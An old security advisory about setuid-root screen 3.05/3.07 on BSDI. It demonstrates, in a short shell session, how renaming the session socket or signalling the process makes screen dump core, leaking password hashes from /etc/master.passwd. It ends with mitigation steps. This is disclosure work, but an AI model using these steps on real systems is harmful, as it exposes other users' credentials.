COMMAND
	    /usr/contrib/bin/screen
SYSTEMS AFFECTED
	    BSDI
PROBLEM
	    Khelbin  Sunvold  <[email protected]>  posted  following.  The
	    program under  question is  /usr/contrib/bin/screen (BSDI).   This
	    is screen version 3.05.02 and  is installed setuid root, as  it is
	    "supposed" to be.  Here is a demonstration:
	
	        $ screen
	        Screen version 3.05.02 (FAU) 19-Aug-93
	        Copyright (c) 1993 Juergen Weigert, Michael Schroeder
	        Copyright (c) 1987 Oliver Laumann
	        [snip boring messages]
	        [Press Space or Return to end.]
	        $ screen
	        $ cd /tmp/screens/S-khelbin
	        $ ls
	        246.ttyp7.comet
	        $ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\
	        > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
	        > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
	        $ screen -ls
	        /tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous: connect: Invalid argument
	        %1     278 Abort - core dumped  screen -ls
	        $ ls -l
	        total 176
	        srwx------  1 khelbin  khelbin       0 Feb 15 21:33 246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
	        -rw-r--r--  1 khelbin  khelbin  172032 Feb 15 21:33 core.screen
	        $ strings core.screen|less
	
	    The core.screen  file contains  unencrypted password  strings from
	    /etc/master.passwd, which  of course,  should not  be readable  by
	    you.
	    Brett Miller  found the  same bug  in version  3.07.01 running  on
	    BSDI  2.1  and  have  successfully  tested  it  by running screen,
	    suspending with ^Z ...killing the process with a sig 11.  When  an
	    attempt is made to re-enter  the process with fg, the  core dumps.
	    Running strings on the  core file will yield  unshadowed passwords
	    which can be reconstructed.
SOLUTION
	    chmod -s /usr/contrib/bin/screen while using old version.
	    There were  several buffer  overflows in  old versions  of screen,
	    the latest version is 3.7.2 available from
	
	        ftp://prep.ai.mit.edu/pub/gnu/screen-3.7.2.tar.gz.
	
	    The overflows  have been  fixed for  a long  time now,  and I  was
	    unable to reproduce  the core dump  on linux with  screen 3.07.01.
	    Anyway, with BSDI seems to work.